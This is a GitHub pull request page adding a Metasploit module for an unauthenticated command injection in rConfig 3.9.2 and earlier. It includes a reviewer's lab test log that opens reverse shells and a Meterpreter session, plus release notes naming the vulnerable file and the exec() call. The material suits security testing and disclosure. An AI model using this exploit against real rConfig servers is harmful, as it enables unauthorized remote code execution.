Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add rConfig install Command Execution exploit #12507

Merged
merged 3 commits into from Nov 6, 2019

Conversation

@bcoles
Copy link
Contributor

bcoles commented Oct 29, 2019

Add rConfig install Command Execution exploit.

    This module exploits an unauthenticated command injection vulnerability
    in rConfig versions 3.9.2 and prior. The `install` directory is not
    automatically removed after installation, allowing unauthenticated users
    to execute arbitrary commands via the `ajaxServerSettingsChk.php` file
    as the web server user.

    This module has been tested successfully on rConfig version 3.9.2 on
    CentOS 7.7.1908 (x64).

It's worth noting that the installer warns the user to remove the install directory at the end of the installation process, and upon successful login.

rconfig-install-warning

rconfig-login-warning

@space-r7 space-r7 self-assigned this Nov 6, 2019
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Nov 6, 2019

Already had a CentOS box ready to go, so I went ahead and installed rConfig. Code looks good to me!

Testing rConfig v3.9.2 on centos 7:

AUS-MBP-3832:metasploit-framework space$ ./msfconsole -q
msf5 > use exploit/unix/webapp/rconfig_install_cmd_exec 
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set rhosts 172.16.215.159
rhosts => 172.16.215.159
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > run

[*] Started reverse TCP double handler on 172.16.215.1:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo M0xYzCR3y2NCKx2x;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Command: echo Gy12m6m3pec8mdNj;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "M0xYzCR3y2NCKx2x\r\n"
[*] Matching...
[*] A is input...
[*] Reading from socket B
[*] B: "Gy12m6m3pec8mdNj\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.215.1:4444 -> 172.16.215.159:43540) at 2019-11-06 13:26:46 -0600
[*] Command shell session 2 opened (172.16.215.1:4444 -> 172.16.215.159:43536) at 2019-11-06 13:26:46 -0600

id
uid=48(apache) gid=48(apache) groups=48(apache)
uname -a
Linux localhost.localdomain 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 1? [y/N]  y
""

[*] 172.16.215.159 - Command shell session 1 closed.  Reason: User exit
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set target 1
target => 1
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[*] Sending stage (985320 bytes) to 172.16.215.159
[*] Meterpreter session 3 opened (172.16.215.1:4444 -> 172.16.215.159:43544) at 2019-11-06 13:27:10 -0600
[*] Command Stager progress - 100.00% done (799/799 bytes)

meterpreter > getuid
Server username: uid=48, gid=48, euid=48, egid=48
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.7.1908 (Linux 3.10.0-1062.4.1.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
space-r7 added a commit that referenced this pull request Nov 6, 2019
@space-r7 space-r7 merged commit 08d51ac into rapid7:master Nov 6, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
msjenkins-r7 added a commit that referenced this pull request Nov 6, 2019
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Nov 6, 2019

Release Notes

This exploits a command injection vulnerability in rConfig versions v3.9.2 and below. Remote code execution can be gained by leveraging a file that's left on the system post installation of rConfig. The ajaxServerSettingsChk.php file uses the unsanitized $rootUname variable later in a call to exec(), which enables execution of malicious code passed through the variable.

@bcoles bcoles deleted the bcoles:rconfig_install_cmd_exec branch Nov 6, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.